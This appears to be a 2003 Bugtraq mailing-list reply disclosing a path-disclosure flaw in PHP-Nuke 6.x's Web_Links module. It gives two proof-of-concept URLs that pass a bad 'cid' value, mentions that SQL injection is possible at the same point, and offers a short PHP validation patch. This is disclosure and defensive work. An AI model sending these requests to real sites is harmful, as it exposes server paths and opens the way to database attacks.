Date: Tue, 13 May 2003 00:22:25 +0200 (MEST)
From: Rynho Zeros Web <hackargentino@....net>
To: bugtraq@...urityfocus.com
Subject: Re: Lot of SQL injection on PHP-Nuke 6.5 (secure weblog!)

I have also discovered a Path Disclosure on PHP-Nuke 6.x, and
others?

Exploit:

http://victim.x/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=[any_words]
http://victim.x/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink

If [ any_words ] has a nonnumerical value or a NULL value, this will produce
"path disclosure".  In addition to this form, since Ripe has informed, a SQL
Injection can be made.

Patch (this is a temporal patches, but... is running)
In the viewlink function insert the following thing:

------------------------[ CODE ]------------------------

if(!isset($cid) || $cid == NULL || $cid == "" || !is_numeric ($cid))
{
    echo "I don't like you >:|";
    exit();
}